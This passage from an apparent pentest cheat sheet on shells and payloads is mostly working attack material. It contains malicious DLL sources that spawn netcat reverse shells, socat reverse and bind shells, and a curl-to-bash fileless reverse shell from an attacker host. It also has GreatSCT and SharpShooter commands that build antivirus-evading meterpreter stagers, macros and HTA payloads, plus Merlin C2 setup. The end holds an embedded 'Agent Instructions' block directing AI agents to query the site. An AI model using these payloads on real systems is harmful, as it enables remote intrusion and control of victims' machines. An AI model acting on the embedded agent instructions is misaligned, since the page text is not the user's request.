WinExec("C:\\Windows\\system32\\spool\\drivers\\color\\nc.exe 4545 -e powershell", 0); ExitProcess(0); } return TRUE; } // [x64 compile]: x86_64-w64-mingw32-gcc DllMain.c -shared -o DllMain32.dll // [x86 compile]: i686-w64-mingw32-gcc DllMain.c -shared -o DllMain64.dll // rundll32 DllMain64.dll,DllMain ``` * Payload 0x02 ```c #include BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){ switch(dwReason){ case DLL_PROCESS_ATTACH: system("cmd.exe /c ping -n 1 "); WinExec("C:\\windows\\System32\\spool\\drivers\\color\\nc.exe -e cmd 4545", 0); //This doesn't accept redirections like system break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE; } /// [x86 compile]: i686-w64-mingw32-gcc payload02.c -shared -o payload02.dll -lws2_32 // [x86 compile]: i686-w64-mingw32-gcc payload02.c -shared -o payload02.dll // [x64 compile]: x86_64-w64-mingw32-gcc payload02.c -shared -o payload02.dll ``` * Payload 0x03 \[C++] ```c #include int owned() { system("cmd.exe /c ping -n 1 "); WinExec("C:\\Windows\\system32\\spool\\drivers\\color\\nc.exe 4545 -e powershell", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { owned(); return 0; } // [Step01]: x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL payload03.cpp // [Step02]: x86_64-w64-mingw32-g++ -shared -o payload03.dll payload03.o -Wl,--out-implib,payload03.a ``` * Payload 0x04 ```c #include #include #include void Entry (){ //Default function that is executed when the DLL is loaded system("cmd.exe /c ping -n 1 "); WinExec("C:\\Windows\\system32\\spool\\drivers\\color\\nc.exe 4545 -e powershell", 0); } BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } // [x86 compile]: i686-w64-mingw32-gcc payload04.c -shared -o payload04.dll -lws2_32 // [x86 compile]: i686-w64-mingw32-gcc payload04.c -shared -o payload04.dll // [x64 compile]: x86_64-w64-mingw32-gcc payload04.c -shared -o payload04.dll ``` ## 10. Socat * Reverse shell ```bash ## ------------------| On attacker machine (Listen) socat -d -d TCP4-LISTEN:4545 STDOUT ## ------------------| On victim machine socat TCP4::4545 EXEC:/bin/bash socat TCP4::4545 EXEC:'cmd.exe',pipes ``` * Reverse shell \[**Encrypted**] ```bash ## ------------------| On attacker machine (Listen) openssl req -newkey rsa:2048 -nodes -keyout ssl.key -x509 -days 1000 -subj '/CN=nothing/O=Nothing LTD./C=US' -out ssl.crt cat ssl.key ssl.crt > ssl.pem socat -d -d OPENSSL-LISTEN:4443,cert=ssl.pem,verify=0,fork STDOUT ## ------------------| On victim machine socat OPENSSL::4443,verify=0 EXEC:/bin/bash socat OPENSSL::4443,verify=0 EXEC:'cmd.exe',pipes ``` * Bind shell ```bash ## ------------------| On victim machine (Listen) socat -d -d TCP4-LISTEN:4545 EXEC:/bin/bash socat -d -d TCP4-LISTEN:4545 EXEC:'cmd.exe',pipes ## ------------------| On attacker machine socat - TCP4::4443 ``` * Bind shell \[**Encrypted**] ```bash ## ------------------| On victim machine (Listen) openssl req -newkey rsa:2048 -nodes -keyout ssl.key -x509 -days 1000 -subj '/CN=nothing/O=Nothing LTD./C=US' -out ssl.crt cat ssl.key ssl.crt > ssl.pem socat OPENSSL-LISTEN:4443,cert=ssl.pem,verify=0,fork EXEC:/bin/bash socat OPENSSL-LISTEN:4443,cert=ssl.pem,verify=0,fork EXEC:'cmd.exe',pipes ## ------------------| On attacker machine socat - OPENSSL::4443,verify=0 ``` ## 11. [GreatSCT](https://github.com/GreatSCT/GreatSCT) * Basic use ```bash ## ------------------| Create payload python3 /opt/GreatSCT/GreatSCT.py --clean python3 /opt/GreatSCT/GreatSCT.py --ip --port 4545 -t bypass -p regsvcs/meterpreter/rev_tcp.py -o serv ## ------------------| Create pwn.bat cmd /c "echo C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Temp\serv.dll > C:\Temp\pwn.bat" ## ------------------| Start msfconsole msfconsole -r /usr/share/greatsct-output/handlers/serv.rc ``` * Custom-written pure `msbuild meterpreter` stager. ```bash ## ------------------| Create payload python3 /opt/GreatSCT/GreatSCT.py --clean python3 /opt/GreatSCT/GreatSCT.py --ip --port 4545 -t bypass -p msbuild/meterpreter/rev_tcp.py -o payload ## ------------------| Start msfconsole msfconsole -r /usr/share/greatsct-output/handlers/payload.rc ## ------------------| Execute ### copy this file to the compromised machine: /usr/share/greatsct-output/source/payload.xml cmd /c C:\Windows\microsoft.net\Framework\v4.0.30319\msbuild.exe payload.xml sessions -i sessions 1 ``` * Common flags ```bash GreatSCT Options: --update Update the GreatSCT framework. --version Displays version and quits. --list-tools List GreatSCT's tools -t Bypass, --tool Bypass Specify GreatSCT tool to use (Bypass) Callback Settings: --ip IP, --domain IP IP Address to connect back to --port Port Port number to connect to. [*] Payload Settings: --list-payloads Lists all available payloads for that tool Great Scott Options: -c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]] Custom payload module options. -o OUTPUT NAME Output file base name for source and compiled binaries. -p [PAYLOAD] Payload to generate. Lists payloads if none specified. --clean Clean out payload folders. --msfoptions [OPTION=value [OPTION=value ...]] Options for the specified metasploit payload. --msfvenom [windows/meterpreter/reverse_tcp] Metasploit shellcode to generate. ``` ## 13. [Merlin](https://github.com/Ne0nd0g/merlin) * [Merlin Agent](https://github.com/Ne0nd0g/merlin-agent) ```bash ## ------------------| Create Agent git clone https://github.com/Ne0nd0g/merlin-agent ## change following lines. var url = "https://127.0.0.1:443" var protocol = "https" var psk = "S3cureK3y658" ### For windows GOOS=windows GOARCH=amd64 go build GOOS=windows GOARCH=386 go build ### For Linux GOOS=linux GOARCH=amd64 go build ``` * [Merlin Server](https://github.com/Ne0nd0g/merlin/releases/tag/v1.3.0) ```bash ## ------------------| Create Cert [For old versions] cd /data/x509 openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=G0ole.c0m" -days 3356 ## ------------------| Start server and create listner ./merlinServer listeners create https set Name win64 set Interface set PSK S3cureK3y658 show run ``` ## [14. SharpShooter](https://github.com/mdsecactivebreach/SharpShooter) ```bash ## ------------------| Setup git clone https://github.com/mdsecactivebreach/SharpShooter.git wget https://files.pythonhosted.org/packages/17/73/615d1267a82ed26cd7c124108c3c61169d8e40c36d393883eaee3a561852/jsmin-2.2.2.tar.gz tar xzf jsmin-2.2.2.tar.gz cd jsmin-2.2.2 sudo python2 setup.py install cd SharpShooter.git python2 SharpShooter.py --help ## ------------------| Create Payloads #### Stageless JavaScript python2 SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3 #### Stageless HTA python2 SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee #### Staged VBS python2 SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4 #### Custom CSharp inside VBS python2 SharpShooter.py --dotnetver 2 --payload js --sandbox 2,3,4,5 --delivery web --refs mscorlib.dll,System.Windows.Forms.dll --namespace MDSec.SharpShooter --entrypoint Main --web http://www.phish.com/implant.payload --output malicious --smuggle --template mcafee #### Creation of a Squiblytwo VBS python2 SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl #### Creation of a XSL HTA python2 SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl #### Creation of a VBA Macro python2 SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl #### Creation of an Excel 4.0 SLK Macro Enabled Document msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o shellcode-encoded.bin -b '\x00' python2 SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee ``` ## [15. Living Off The Land \[Linux\]](https://www.youtube.com/watch?v=MaBurwnrI4s) * [With DDExec](https://youtu.be/MaBurwnrI4s?t=366) ```bash ## ------------------| Attacker's machine base64 -w0 $(which nc) > nc.b64 wget https://raw.githubusercontent.com/arget13/DDexec/main/ddexec.sh sudo python3 -m http.server 80 nc -lvnp 4545 ## ------------------| Victim's machine curl AttackersIP/nc.b64 | bash <(curl AttackersIP/ddexec.sh) /bin/nothing -e /bin/sh AttackersIP 4545 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://p0db0t.gitbook.io/pentest/tools/shells-payloads.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.